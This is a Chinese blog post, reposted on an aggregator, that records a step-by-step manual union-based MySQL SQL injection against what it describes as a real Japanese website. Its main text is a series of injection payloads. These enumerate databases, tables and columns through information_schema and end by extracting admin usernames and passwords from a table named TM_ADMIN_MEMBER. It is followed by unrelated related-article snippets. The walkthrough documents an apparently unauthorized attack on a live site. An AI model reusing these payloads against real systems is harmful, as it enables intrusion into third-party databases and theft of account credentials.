mysql报错注入实战_MySQL手工注入实战

mysql报错注入实战_MySQL手工注入实战

news/2025/4/11 15:32:27/文章来源:https://blog.csdn.net/weixin_34972980/article/details/113610633

实战记录，日本某站

注入点 and 语句测试

and1=1 返回正常，and=2跳回首页，可能过滤了

用 ’ 测试返回错误页面

判断为注入点

order by语句查询字段数

测试字段数为9

and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9

报错联合查询语句，查询显示位

2、3为显示位

使用注入函数可爆出数据库版本信息

and 1=2 UNION SELECT 1,@@version_compile_os,3,4,5,6,7,8,9

注入函数@@version_compile_os爆出操作系统

and 1=2 UNION SELECT 1,database(),3,4,5,6,7,8,9

用注入函数database()爆出当前库

Mysql 5 以上有内置库 information_schema，存储着mysql的所有数据库和表结构信息

and1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8,9 from information_schema.SCHEMATA limit 0,1

库1

爆出第二个数据库，limit1,1即可

发现第二个数据库就是当前库

库2

and 1=2 union select 1,TABLE_NAME,3,4,5,6,7,8,9from information_schema.TABLES whereTABLE_SCHEMA=(库2名字16进制)limit 0,1

爆第一个表名，数据库名要转换为16进制

表1 敏感表

改为limit 1,1可爆第二个表名

表2

and 1=2 union select 1,group_concat(TABLE_NAME),3,4,5,6,7,8,9 from information_schema.TABLES where TABLE_SCHEMA=0x68656E65636961 limit 0,1

使用group_concat(table_name)可以一次爆出全部表名

已得到敏感表名TM_ADMIN_MEMBER，接下来爆字段

表名要转换为16进制

and 1=2 union select

1,COLUMN_NAME,3,4,5,6,7,8,9 from

information_schema.COLUMNSwhere TABLE_NAME= limit 0,1

推荐使用这种方法

and 1=2 union select 1,group_concat(COLUMN_NAME),3,4,5,6,7,8,9 from information_schema.COLUMNS where TABLE_NAME= limit 0,1

#COLUMN 翻译为列

用 group_concat(COLUMN_NAME)函数可以一次爆出全部字段

或者可以修改limit 1,1、limit 2,1.......来一个一个爆出

敏感字段

有敏感表名，敏感字段名后就获取内容

经测试login_uid字段存放的是用户名

login_pwd存放的是密码

and 1=2 union select 1,login_uid,login_pwd,4,5,6,7,8,9 from 表名

接下来的自行脑补.......

欢迎各位大神指点批评！

晨风

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/267445.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

20个简约风格网站设计作品欣赏

20个简约风格网站设计作品欣赏

这篇文章收集了20个简洁清爽的网站设计作品案例，设计师们能够通过这些优秀的网页设计作品获得灵感，进而设计出更精美，更具有创意的网站作品，一起欣赏。vnsagaPure – Minimal WordPress themeAssemblydeladeeus design studioHocu…

阅读更多...

python 股票自动交易从零开始_Python股票自动交易从零开始

python 股票自动交易从零开始_Python股票自动交易从零开始

课程目录1.Python股票自动交易从零开始~第一集~简介(Av24528809,P1).mp42.Python股票自动交易从零开始~第二集~安装工具包(Av24528809,P2).mp43.Python股票自动交易从零开始~第二集番外~配置Mac工作环境(Av24528809,P3).mp44.Python股票自动交易从零开始~第三集~获得股票列表-A…

阅读更多...

[Js-开发常识]为什么定义实体类属性建议用 Ineger 而不是 int

[Js-开发常识]为什么定义实体类属性建议用 Ineger 而不是 int

因为 Integer 包装类型允许 null 值，避免在框架底层调用时产生空指针异常所以一般建议使用 Integer转载于:https://www.cnblogs.com/jiasq/p/8588767.html

阅读更多...

python 银行工作_Python：银行系统实战（一）

python 银行工作_Python：银行系统实战（一）

最近突然抽筋想做一下大学时候做过的银行系统实战~代码就发在这里啦~学弟学妹们请查收~不过是python版本的，你们也用不上。。。两个py文件，一个是后台系统处理的，一个是总控py文件如下：view.py 内容如下：import timecl…

阅读更多...

出现 java.util.ConcurrentModificationException 时的解决办法

出现 java.util.ConcurrentModificationException 时的解决办法

for (int i0; i<list.size(); i) {　　// 只有在这种方式遍历集合时，同时对集合增加、删除才不会影响。 // list.remove(list.get(i)); } 在对一个map进行迭代遍历并删除一些符合条件的键值对的时候，容易出现 java.util.ConcurrentModificati…

阅读更多...

深入剖析LinkedList：揭秘底层原理

深入剖析LinkedList：揭秘底层原理

文章目录一、概述LinkedList1.1 LinkedList简介1.2 LinkedList的优点和缺点二、 LinkedList数据结构分析2.1 Node节点结构体解析2.2 LinkedList实现了双向链表的原因2.3 LinkedList如何实现了链表的基本操作（增删改查）2.4 LinkedList的遍历方式三、 …

阅读更多...

【Mysql优化】索引覆盖

【Mysql优化】索引覆盖

索引覆盖是指如果查询的列恰好是索引的一部分,那么查询只需要在索引文件上进行,不需要回行到磁盘再找数据.这种查询速度非常快,称为”索引覆盖”,比平时的查询少一次到磁盘读数据的操作。(索引正好覆盖到查询的数据) 例如下面: mysql> use exam9; Database changed mysql&…

阅读更多...

mysql strtok_c函数: strtok 和 strtok_r 详解

mysql strtok_c函数: strtok 和 strtok_r 详解

函数名: strtok功能: 查找由在第二个串中指定的分界符分隔开的单词用法: char *strtok(char *str1, char *str2);程序例:#include #include int main(void){char input[16] "abc,d";char *p;/* strtok places a NULL…

阅读更多...

Ubuntu 屏幕亮度调整

Ubuntu 屏幕亮度调整

首先系统要安装好受限显卡驱动；安装gedit，修改xorg.conf： sudo apt-get install geditsudo gedit /etc/X11/xorg.conf加入红色的一行如下：Section "Screen"Identifier "Default Screen"DefaultDepth 24…

阅读更多...

【面试】前端面试题

【面试】前端面试题

石墨文档 1.git命令用过哪些 2.css3用过哪些 3.box- sizing 默认值content-box border - box 内容的宽高要从已设定的宽高减去边框和内边距 inherit 从父元素继承 4.跨域 jsonp为什么可以跨域浏览器为了安全有一种同源策略，协议.域名.端口有一个不同都是跨域&#…

阅读更多...

mysql+server+80_Windows Server 2019 IIS10.0+PHP(FastCGI)+MySQL环境搭建教程

mysql+server+80_Windows Server 2019 IIS10.0+PHP(FastCGI)+MySQL环境搭建教程

准备篇一、环境说明：操作系统：Windows Server 2019PHP版本：php 7.3.11MySQL版本：MySQL 8.0.18.0二、相关软件下载：1、PHP下载地址：https://windows.php.net/downloads/releases/php-7.3.11-nts-Win32-VC15-…

阅读更多...

win7下开启和使用telnet的方法

win7下开启和使用telnet的方法

win7下开启和使用telnet的方法首先，出于安全考虑，win7已经禁用了telnet这一功能，因为telnet是明文传输的，安全性相当差。转载于:https://blog.51cto.com/xinchq2011/727638

阅读更多...

SharePoint Server和Office 365之间的混合模式集成概述

SharePoint Server和Office 365之间的混合模式集成概述

正如您可能已经知道的那样，云中的Microsoft Office 365和SharePoint Server 2013/2016内部部署可以通过多种方式协同工作。这些通常被称为混合模式，因为它们将功能集成到SharePoint Online和SharePoint内部部署中。以下Microsoft提供了下对照表&#xf…

阅读更多...

perl中的map和grep

perl中的map和grep

map 语法： map EXPR, LIST map BLOCK, LIST 语义： 对于LIST中的每个元素执行EXPR或者BLOCK，如果返回值存储在list中，则表示处理后的list，若返回值存储在scalar中，则表示处理后的list中元素个数。下面是几个…

阅读更多...

图片压缩

图片压缩

1）一张图片如何显示到屏幕上一个电脑显示器, 上面的像素点就是内存/显存一张图片表达的颜色信息赋值到那块内存就是图片显示2）图片文件的格式图片文件的格式，无论是哪一种，最终都要包含原始颜色数据原始颜色数据一个像素用rgb…

阅读更多...

python io操作需要用到什么硬件_Python I/O 操作（一）

python io操作需要用到什么硬件_Python I/O 操作（一）

一、I/O 概念I/O 指的是相对内存而言的 input 和 output从文件、数据库、网络向内存中写入数据叫做 input从内存向文件、数据库、网络中输出数据叫做 outputI/O 操作相比 CPU 操作而言是极慢的，往往 CPU 运行一秒钟，I/O 要忙几个月，所以要提高…

阅读更多...

fortinate防火墙使用本地用户三步开通PPTP ***

fortinate防火墙使用本地用户三步开通PPTP ***

1. 建立用户Local用户及用户组 2. 启用PPTP ***拨号功能 3. 建立***地址，并设置策略：让***用户可以访问内部和外部 （注：建***地址和策略时，接口选择是外部，因为是外部拨入的） 完成上述三步&…

阅读更多...

李国浩20179307第二周作业

李国浩20179307第二周作业

人物介绍国内知名黑客： 吴翰青：阿里云首席安全科学家、云盾负责人，也是网络安全领域为人熟知的“刺”、“道哥”和“小黑”。他要想黑谁家的网站，别说企业、医院，银行都要彻夜难眠。但小黑是白帽子，黑客最…

阅读更多...

rust windows 交叉编译_交叉编译和静态链接 RUST 库

rust windows 交叉编译_交叉编译和静态链接 RUST 库

在 CSIS 中，我们过去使用 Python 编写后端，同时为 Incident Response Toolkit 编写一些 C/C 代码。几年前，主要是由于性能原因，我们开始用 Rust 替换 Python 重写了一些特定的后端服务，并取得了巨大的成功。现在&#…

阅读更多...

转lua解释执行脚本流程

转lua解释执行脚本流程

本文转自：http://www.cnblogs.com/zxh1210603696/p/4458473.html #include "lua.hpp"#include <iostream> using namespace std;#pragma comment(lib, "lua5.1.lib")struct lua_guard{lua_State *pL;lua_guard(lua_State *s) :pL(s){}~lu…

阅读更多...

最新文章